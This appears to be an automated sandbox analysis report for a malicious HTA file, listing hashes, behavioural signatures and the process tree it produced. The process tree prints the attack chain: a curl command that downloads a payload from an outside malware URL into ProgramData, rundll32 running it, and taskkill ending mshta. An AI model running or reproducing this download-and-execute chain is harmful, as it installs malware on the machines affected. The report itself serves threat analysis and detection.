Resubmissions
02-02-2023 21:19
230202-z6jahaba9y 1002-02-2023 21:19
230202-z6b67aba9w 702-02-2023 21:17
230202-z48sdafh78 702-02-2023 20:21
230202-y5afjaae3w 1002-02-2023 20:20
230202-y4k6msfd36 702-02-2023 20:03
230202-ysnsdsac8z 702-02-2023 20:02
230202-yr9ngaac8w 702-02-2023 20:01
230202-yrllmsfb54 702-02-2023 19:47
230202-yhszcsab9z 702-02-2023 19:46
230202-yg5lrsfa45 7Analysis
-
max time kernel
948s -
max time network
950s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
02-02-2023 20:03
Static task
static1
Behavioral task
behavioral1
Sample
Open.hta
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
Open.hta
Resource
win10v2004-20220812-en
General
-
Target
Open.hta
-
Size
3KB
-
MD5
7daa66c5c04a63b630e284360740bc3f
-
SHA1
13ccbcef1329ae8c204c13e757a867e31f3b62bc
-
SHA256
35e319a9cd3e423081fa1d0a0c084f555b1c5fb1042189dd969d1706f6d25fe2
-
SHA512
c23873af1524f9d97e4f4066a64240a6339c9ebe30ed1a623c60db683b0e85189dab28976f9116a7c9a38a864b9acdc8de66fda96ea7e3e58b46217efe965744
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 1508 taskkill.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
taskkill.exedescription pid process Token: SeDebugPrivilege 1508 taskkill.exe -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
mshta.exedescription pid process target process PID 4568 wrote to memory of 5048 4568 mshta.exe curl.exe PID 4568 wrote to memory of 5048 4568 mshta.exe curl.exe PID 4568 wrote to memory of 5048 4568 mshta.exe curl.exe PID 4568 wrote to memory of 4268 4568 mshta.exe rundll32.exe PID 4568 wrote to memory of 4268 4568 mshta.exe rundll32.exe PID 4568 wrote to memory of 4268 4568 mshta.exe rundll32.exe PID 4568 wrote to memory of 1508 4568 mshta.exe taskkill.exe PID 4568 wrote to memory of 1508 4568 mshta.exe taskkill.exe PID 4568 wrote to memory of 1508 4568 mshta.exe taskkill.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Open.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\curl.exe"C:\Windows\System32\curl.exe" --output C:\ProgramData\1.png --url https://spincotech.com/8CoBExd/3.gif2⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\ProgramData\1.png,Wind2⤵
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im mshta.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken